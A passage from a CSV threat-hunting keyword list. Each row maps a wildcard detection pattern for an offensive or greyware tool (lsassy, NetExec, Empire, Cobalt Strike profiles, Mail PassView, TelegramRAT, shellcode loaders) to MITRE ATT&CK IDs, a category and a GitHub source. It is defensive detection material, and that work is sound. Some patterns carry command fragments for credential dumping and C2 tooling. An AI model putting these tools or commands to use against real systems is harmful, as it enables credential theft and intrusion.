Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*LyncSniper*","offensive_tool_keyword","LyncSniper","LyncSniper is a tool for penetration testing Lync and Skype for Business deployments hosted either on premise or in Office 365","T1566 - T1574 - T1210 - T1596","TA0002 - TA0011 - TA0009","N/A","N/A","Exploitation tools","https://github.com/mdsecactivebreach/LyncSniper","1","0","N/A","N/A","1","9","3","2017-04-11T08:38:28Z","2017-06-12T10:56:58Z" +"*-m * -d * -w * --top-web-ports*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","0","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" +"*-m dumpert *","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*-M handlekatz -o *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*M.i.m.i.k.a.t.z*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*m00zh33/golang_c2*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" +"*m0rv4i/SharpCookieMonster*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" +"*m3f157O/combine_harvester*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","1","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" +"*m4ll0k/SecretFinder*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*MAAD_Attack.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*MAAD_Config.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*MAAD_Mitre_Map.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*MAADInitialization.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*mac.changer on*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*mac_dirty_cow.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*mac2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*mac2john-alt.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*MaccaroniC2.git*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" +"*macchanger -r *","greyware_tool_keyword","macchanger","changing mac address with macchanger","T1497.001 - T1036.004 - T1059.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","5","10","N/A","N/A","N/A","N/A" +"*macchanger -r*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","0","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" +"*macdlemfnignjhclfcfichcdhiomgjjb*","greyware_tool_keyword","Free Fast VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*MaceTrap.exe*","offensive_tool_keyword","macetrap","MaceTrap is a proof-of-concept for time stomping using SetFileTime. MaceTrap allows you to set the CreationTime / LastAccessTime / LastWriteTime for arbitrary files and folders","T1070.004","TA0040","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/MaceTrap","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*machine1337/TelegramRAT*","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","198","35","2023-08-25T13:41:49Z","2023-06-30T10:59:55Z" +"*MacOS/ipscan -*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*macro_pack*","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1566.001 - T1564.001 - T1564.003","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","1950","404","2022-05-12T13:30:29Z","2017-10-03T18:30:06Z" +"*MacroDetectSandbox.vbs*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" +"*MacroExploit.txt*","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","1","21","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z" +"*Macrome *--decoy-document*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*Macrome *--payload*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*Macrome build*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*Macrome.csproj*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*Macrome.dll*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*Macrome.sln*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*MACshellcode.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*MACshellcode.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*MACshellcode.sln*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*MACshellcode.vcxproj*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*magicRasMan*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" +"*Magnitude Exploit Kit*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*mailpv.exe*","offensive_tool_keyword","mailpv","Mail PassView is a small password-recovery tool that reveals the passwords and other account details in email clients","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*mailpv.zip*","offensive_tool_keyword","mailpv","Mail PassView is a small password-recovery tool that reveals the passwords and other account details in email clients","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*MailSniper*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc...). It can be used as a non-administrative user to search their own email. or by an Exchange administrator to search the mailboxes of every user in a domain","T1083 - T1114 - T1003","TA0003 - TA0007 - TA0040","N/A","N/A","Information Gathering","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*MailSniper.ps1*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*main/gcr.py*","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","1","N/A","10","10","78","15","2023-06-26T09:04:02Z","2023-06-18T13:23:31Z" +"*main_air_service-probes.go*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*main_pro_service-probes.go*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*majdfhpaihoncoakbjgbdhglocklcgno*","greyware_tool_keyword","Free VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*make_avet -l *.exe *","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*make_avetsvc *","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*make_kernel_shellcode*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_kernel_user_payload*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb1_anonymous_login_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb1_echo_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 